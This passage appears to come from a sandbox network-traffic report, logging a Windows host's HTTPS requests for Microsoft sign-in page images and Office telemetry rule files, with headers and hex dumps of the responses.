                                                                    2024-10-28 13:03:22 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                    Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.44979113.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:22 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:23 UTC805INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:22 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 673
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                    ETag: 0x8DB5C3F47E260FD
                                                                    x-ms-request-id: f0228aca-801e-0049-6203-28be10000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130322Z-17c5cb586f6z6tw6g7cmdv30m8000000069g000000002pqd
                                                                    x-fd-int-roxy-purgeid: 4554691
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                    Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.44979013.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:22 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:23 UTC805INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:22 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                    ETag: 0x8DB5C3F49C21D98
                                                                    x-ms-request-id: 6c15f187-201e-004b-54c1-2748ba000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130322Z-17c5cb586f6g6g2sbe6edp75y4000000074g000000005ck5
                                                                    x-fd-int-roxy-purgeid: 4554691
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                    Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    41192.168.2.44978413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:23 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 469
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                    ETag: "0x8DC582BBA701121"
                                                                    x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b78wv88bk51myq5vxc00000005b0000000009x1a
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    42192.168.2.44978713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:23 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 464
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                    x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b78qf2gleqhwczd21s00000005a0000000006zmw
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    43192.168.2.44978513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:23 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 477
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                    x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b78fkwcjkpn19c5dsn00000003z000000000hs5y
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    44192.168.2.44978613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:23 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 415
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                    ETag: "0x8DC582BA41997E3"
                                                                    x-ms-request-id: a32196a2-e01e-0051-3ed7-2684b2000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-r197bdfb6b48v72xb403uy6hns00000005m0000000007b0c
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    45192.168.2.44978813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:23 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 494
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                    ETag: "0x8DC582BB7010D66"
                                                                    x-ms-request-id: e7bd3bd0-f01e-003c-42e3-258cf0000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-15b8d89586f4zwgbgswvrvz4vs000000065000000000bfm6
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    46192.168.2.44979613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                    ETag: "0x8DC582B9748630E"
                                                                    x-ms-request-id: cfe50472-201e-00aa-2cfd-263928000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-17c5cb586f626sn8grcgm1gf8000000003n000000000214u
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    47192.168.2.44979813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 404
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                    x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b785dznd7xpawq9gcn00000006bg00000000f3p3
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    48192.168.2.44979713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:23 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:24 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:23 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 472
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                    ETag: "0x8DC582B9DACDF62"
                                                                    x-ms-request-id: 864201cb-901e-0015-2b18-26b284000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130323Z-16849878b787bfsh7zgp804my400000003vg00000000ab6c
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
